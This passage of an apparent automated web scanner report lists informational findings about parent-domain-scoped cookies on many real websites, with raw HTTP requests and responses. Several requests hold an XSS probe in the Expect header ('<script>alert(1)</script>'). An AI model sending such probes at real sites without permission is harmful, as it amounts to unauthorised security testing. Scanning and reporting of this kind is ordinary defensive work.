User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bfcu.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:03:18 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.1304420598988399; path=/; expires=Fri, 30-Apr-21 11:03:18 GMT; domain=.bfcu.org
Last-Modified: Thu, 27 Apr 2006 21:09:39 GMT
ETag: "1889fdc-0-412700194aac0"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html

12.55. http://www.bigtitcreampie.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigtitcreampie.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

psinfo=bbonet%7Cbigtitcreampie%7C1%7Cpps%7C%7C%7C%7C%7C%7C%7C%7C%7Cus; expires=Thu, 02-Jun-2011 11:31:31 GMT; path=/; domain=.bigtitcreampie.com
psextra=173.193.214.243%7COK%3B%7C; expires=Thu, 02-Jun-2011 11:31:31 GMT; path=/; domain=.bigtitcreampie.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bigtitcreampie.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:31:31 GMT
Server: Apache
Set-Cookie: nomobile=0; path=/; domain=.bigtitcreampie.com; expires=Wed, 04-May-2011 07:31:31 GMT
Vary: Host,Accept-Encoding,User-Agent,Accept-Language
X-Powered-By: PHP/5.2.11-pl1-gentoo
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: psinfo=bbonet%7Cbigtitcreampie%7C1%7Cpps%7C%7C%7C%7C%7C%7C%7C%7C%7Cus; expires=Thu, 02-Jun-2011 11:31:31 GMT; path=/; domain=.bigtitcreampie.com
Set-Cookie: psextra=173.193.214.243%7COK%3B%7C; expires=Thu, 02-Jun-2011 11:31:31 GMT; path=/; domain=.bigtitcreampie.com
Cache-Control: max-age=900
Expires: Tue, 03 May 2011 11:46:31 GMT
Content-Type: text/html
Content-Length: 8675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title></title> <meta http-equiv="Content-Language" content="e
...[SNIP]...

12.56. http://www.bizsiteservice.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bizsiteservice.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s=ACLDAPQYXWRJLJGJPJ;path=/;domain=.bizsiteservice.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bizsiteservice.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 Ok
Date: Tue, 3-May-2011 11:30:00 GMT
Server: ezot/3
Connection: close
Set-Cookie: s=ACLDAPQYXWRJLJGJPJ;path=/;domain=.bizsiteservice.com; HttpOnly

<html>
<head>
<meta http-equiv="Refresh" CONTENT="0; URL=http://www.bizsiteservice.com/home/_"></head><body></body></html>

12.57. http://www.blackchristianpeoplemeet.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blackchristianpeoplemeet.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

NSC_QN-CmbdlDisjtujbo=ffffffff09099c2a45525d5f4f58455e445a4a423660;Version=1;path=/;domain=.blackchristianpeoplemeet.com;httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blackchristianpeoplemeet.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
Date: Tue, 03 May 2011 10:31:13 GMT
Set-Cookie: NSC_QN-CmbdlDisjtujbo=ffffffff09099c2a45525d5f4f58455e445a4a423660;Version=1;path=/;domain=.blackchristianpeoplemeet.com;httponly

12.58. http://www.bloomu.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bloomu.edu
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

LBSRVwww=KRXUOUScassiniCKOLI; domain=.bloomu.edu; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bloomu.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: LBSRVwww=KRXUOUScassiniCKOLI; domain=.bloomu.edu; path=/
Date: Tue, 03 May 2011 10:56:47 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 469
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

12.59. http://www.cafe.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafe.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

guest=-15688467; domain=.cafe.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
lastaction=5/3/2011 11:38:44 AM; domain=.cafe.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cafe.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-control: no-cache="set-cookie"
Content-Type: image/x-icon
Date: Tue, 03 May 2011 11:38:44 GMT
ETag: "0a3a3e65d2acb1:0"
Last-Modified: Fri, 23 Jul 2010 11:55:10 GMT
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Server: Microsoft-IIS/7.0
Set-Cookie: guest=-15688467; domain=.cafe.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: lastaction=5/3/2011 11:38:44 AM; domain=.cafe.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: AWSELB=4B9F6D83168D6A48ED28A11AEA43DBB45031A1E282F5DC944339ADEFFF5D1448E1E4B0ECC696BAE3C2F5CF51C81BEFA1879A91BE6C5E02B5DBFEF7B8ED5BA7819C73AAEEC3;PATH=/;MAX-AGE=300
X-Powered-By: ASP.NET
Content-Length: 22486
Connection: keep-alive

..............h...f... ..............00..........v......... .h....... .... ......!..00.... ..%...2..(....... ...................................................+,+...,.(.L.........III.........hhh.1.
...[SNIP]...

12.60. http://www.cariboucoffee.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cariboucoffee.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

VLTALT=33103665#www.cariboucoffee.com; Domain=.cariboucoffee.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cariboucoffee.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Date: Tue, 03 May 2011 11:06:06 GMT
ETag: W/"1150-1270562100000"
Last-Modified: Tue, 06 Apr 2010 13:55:00 GMT
Server: Apache
Set-Cookie: JSESSIONID=785E4739A73480D195A439030BC6FA9E; Path=/
Set-Cookie: VLTALT=33103665#www.cariboucoffee.com; Domain=.cariboucoffee.com; Path=/
Set-Cookie: AWSELB=3389D795106F522A5402DFE94ED1A41D942AD83E85A9A2699A29C61EE1F1F18A975B0EA7B44E2B337742AFD68524F942C7B4C46624DDBE1CAF9DBB2D84B8E80FAFE7B07A2D3943DE8CE7325D2BDC228E00690A4C27;PATH=/
Content-Length: 1150
Connection: keep-alive

............ .h.......(....... ..... .........#...#................................................................................6K.
.F~...............G...........l..u..........................5K..+
...[SNIP]...

12.61. http://www.eatdrinkbetter.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eatdrinkbetter.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

__cfduid=de433de03393d0df6ed544e38456586281304421436; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.eatdrinkbetter.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.eatdrinkbetter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Tue, 03 May 2011 11:17:16 GMT
Content-Type: image/x-icon
Connection: keep-alive
Content-Length: 5686
Last-Modified: Sat, 15 Jan 2011 05:16:48 GMT
CF-Cache-Status: HIT
Expires: Tue, 03 May 2011 13:17:16 GMT
Cache-Control: public, max-age=7200
Accept-Ranges: bytes
Set-Cookie: __cfduid=de433de03393d0df6ed544e38456586281304421436; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.eatdrinkbetter.com
Set-Cookie: __cfduid=de433de03393d0df6ed544e38456586281304421436; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.www.eatdrinkbetter.com

..............h...&... .... .........(....... ...............................m^>.x[).w_3.naB.ncJ.yfB.}hB.....:...>...7...5...$...%...........Z...y...|...c...c...o...n......p...y...R...g..._..._..._.
...[SNIP]...

12.62. http://www.foodsaver.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.foodsaver.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

Cart=CartId=5Vz%2fWc6xAUg%3d; domain=.foodsaver.com; expires=Wed, 04-May-2011 11:38:19 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.foodsaver.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 17050
Date: Tue, 03 May 2011 11:38:19 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=qee54z55dzx3mlu2l0hd0vq4; path=/; HttpOnly
Set-Cookie: Cart=CartId=5Vz%2fWc6xAUg%3d; domain=.foodsaver.com; expires=Wed, 04-May-2011 11:38:19 GMT; path=/
Cache-Control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
FoodSaver.. -
...[SNIP]...

12.63. http://www.gecu-ep.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gecu-ep.org
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

Apache=173.193.214.243.1304421545774269; path=/; expires=Fri, 30-Apr-21 11:19:05 GMT; domain=.gecu-ep.org

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gecu-ep.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:19:05 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.1304421545774269; path=/; expires=Fri, 30-Apr-21 11:19:05 GMT; domain=.gecu-ep.org
Last-Modified: Fri, 04 Mar 2011 18:42:54 GMT
ETag: "2954bbf-37e-49dac838f8780"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/html

..............h.......(....... ...........@.............................................................................................................................................................
...[SNIP]...

12.64. http://www.hlj.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hlj.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

HLJUserId=22X/QU2/2PIhXh7lECHnAg==; expires=Wed, 02-May-12 10:29:06 GMT; domain=hlj.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hlj.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 10:29:06 GMT
Content-Type: image/x-icon
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding
Content-Length: 318
Last-Modified: Tue, 07 Jun 2005 04:03:05 GMT
Accept-Ranges: bytes
Expires: Tue, 03 May 2011 11:29:06 GMT
Cache-Control: max-age=3600
X-UA-Compatible: IE=EmulateIE7
Set-Cookie: HLJUserId=22X/QU2/2PIhXh7lECHnAg==; expires=Wed, 02-May-12 10:29:06 GMT; domain=hlj.com; path=/

..............(.......(....... ...............................................ff..33..33..............f...3...................wwwwwDGwwwwww..WwwwwwD0.wwwwwwp.wwwwwwq.www@..s.wwwp.#t.wwwp.w0..W01.w@. 7
...[SNIP]...

12.65. http://www.kjct8.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kjct8.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

alpha=3dce8f18440b0000eee0bf4de6fe01008a800200; expires=Fri, 30-Apr-2021 11:03:10 GMT; path=/; domain=.kjct8.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kjct8.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 28 May 2010 16:23:54 GMT
ETag: "693ed36-37e-eee43a80"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain
Cache-Control: max-age=1914
Expires: Tue, 03 May 2011 11:35:04 GMT
Date: Tue, 03 May 2011 11:03:10 GMT
Connection: close
Set-Cookie: alpha=3dce8f18440b0000eee0bf4de6fe01008a800200; expires=Fri, 30-Apr-2021 11:03:10 GMT; path=/; domain=.kjct8.com

..............h.......(....... ...........@....................7..7..7..7..6.g4.`PBWb_OccR\WVD6i1..7..7..7..7..7..7..7.n1._vw...n..D..4..3..8..B..TD6.7..7..7..7..7..7.ALI......l..K..@..5..2..2..@..d1.
...[SNIP]...

12.66. http://www.mailfromftd.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mailfromftd.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=66A9FE3A757810750020C76B8BBF5B91; Path=/; Domain=.mailfromftd.com
TLTUID=66A9FE3A757810750020C76B8BBF5B91; Path=/; Domain=.mailfromftd.com; expires=Tue, 03-05-2021 11:28:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mailfromftd.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Set-Cookie: TLTSID=66A9FE3A757810750020C76B8BBF5B91; Path=/; Domain=.mailfromftd.com
Set-Cookie: TLTUID=66A9FE3A757810750020C76B8BBF5B91; Path=/; Domain=.mailfromftd.com; expires=Tue, 03-05-2021 11:28:00 GMT
Location: http://www.ftd.com/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 346
Date: Tue, 03 May 2011 11:27:59 GMT
X-Varnish: 648042392
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>301 Moved Permanently</TITLE>
</HEAD><BODY>
<H1>Moved Permanently</H1>
The document has moved <A HREF="http://www.ftd.com/">here<
...[SNIP]...

12.67. http://www.myeecu.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myeecu.org
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

Apache=173.193.214.243.1304417874314639; path=/; expires=Fri, 30-Apr-21 10:17:54 GMT; domain=.myeecu.org

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myeecu.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:17:54 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.1304417874314639; path=/; expires=Fri, 30-Apr-21 10:17:54 GMT; domain=.myeecu.org
Last-Modified: Fri, 12 Dec 2008 16:43:14 GMT
ETag: "96ec54-0-45ddc3074ec80"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html

12.68. http://www.northstarmls.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.northstarmls.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

BALANCEID=balancer.www1; path=/; domain=.northstarmls.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.northstarmls.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:16 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 09 Jun 2010 18:53:23 GMT
ETag: "285bf-2b-4889d6b94cec0"
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 10:27:16 GMT
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BALANCEID=balancer.www1; path=/; domain=.northstarmls.com
Connection: close

GIF89a.............!.......,...........L..;

12.69. http://www.petsupplies.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.petsupplies.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TLTSID=A0FDEB6F4F0B6DC606ECF9AC5FE47954; Path=/; Domain=.petsupplies.com
TLTUID=A0FDEB6F4F0B6DC606ECF9AC5FE47954; Path=/; Domain=.petsupplies.com; expires=Tue, 03-05-2021 10:42:34 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.petsupplies.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTSID=A0FDEB6F4F0B6DC606ECF9AC5FE47954; Path=/; Domain=.petsupplies.com
Set-Cookie: TLTUID=A0FDEB6F4F0B6DC606ECF9AC5FE47954; Path=/; Domain=.petsupplies.com; expires=Tue, 03-05-2021 10:42:34 GMT
Date: Tue, 03 May 2011 10:42:34 GMT
Set-Cookie: NSC_Qfut-wjqt=e24066363660;path=/

12.70. http://www.prosolutionpills.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.prosolutionpills.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

a=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=.prosolutionpills.com
t=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=.prosolutionpills.com
b=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=.prosolutionpills.com
ref=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=.prosolutionpills.com
upsell=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=.prosolutionpills.com
src=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=.prosolutionpills.com
cd=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=.prosolutionpills.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.prosolutionpills.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:19:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny8
Last-Modified: Tue, 03 May 2011 11:19:55 GMT
P3P: CP="NON NID CURa ADMo TAIo PSAo PSDo OUR NOR COM NAV STA"
Set-Cookie: sswn=93c29678f0dbb8ba598f8f940fd43364; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: a=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: b=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: c=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: t=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: nn=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: src=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: hostid=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: ref=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: upsell=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: mh=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: cd=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: a=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: t=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: b=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: ref=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: upsell=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: mh=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/
Set-Cookie: c=1; expires=Mon, 23-Apr-2012 11:19:55 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: src=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: nn=0; expires=Mon, 23-Apr-2012 11:19:55 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: cd=deleted; expires=Mon, 03-May-2010 11:19:54 GMT; path=/; domain=.prosolutionpills.com
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 29312

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Male Enhancement Pills, Natural Penis Enhancement, Penis Pills</title>
<meta
...[SNIP]...

12.71. http://www.quiltersclubofamerica.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.quiltersclubofamerica.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Tue, 03 May 2011 05:36:12 GMT; domain=quiltersclubofamerica.com; expires=Wed, 02-May-2012 10:36:12 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.quiltersclubofamerica.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Wed, 20 May 2009 20:26:08 GMT
Accept-Ranges: bytes
ETag: "07043589d9c91:0"
Server: Microsoft-IIS/7.0
CommunityServer: 4.1.31106.3070
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Tue, 03 May 2011 05:36:12 GMT; domain=quiltersclubofamerica.com; expires=Wed, 02-May-2012 10:36:12 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-2101=; path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:36:11 GMT
Content-Length: 894

..............h.......(....... ...............................1..,..,..,..,..,..0..A$.>"./
.,..,..,..,..,..1..0..*..*..*..P9...................J1.*..*..*..0..0..*..*...}.........................wp.*..
...[SNIP]...

12.72. http://www.superstreetonline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.superstreetonline.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UserPuid=2310453048226087200; domain=superstreetonline.com; expires=Tue, 03-May-2061 10:32:13 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.superstreetonline.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:32:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rdr1rh555ettuhzuidsqbrn5; path=/; HttpOnly
Set-Cookie: UserPuid=2310453048226087200; domain=superstreetonline.com; expires=Tue, 03-May-2061 10:32:13 GMT; path=/
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 1150

............ .h.......(....... ..... .....@.............................................................................................................................................................
...[SNIP]...

12.73. http://www.twilightersanonymous.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.twilightersanonymous.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

__cfduid=d70863eeee52760fadc52e4eef49d29211304418604; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.twilightersanonymous.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.twilightersanonymous.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

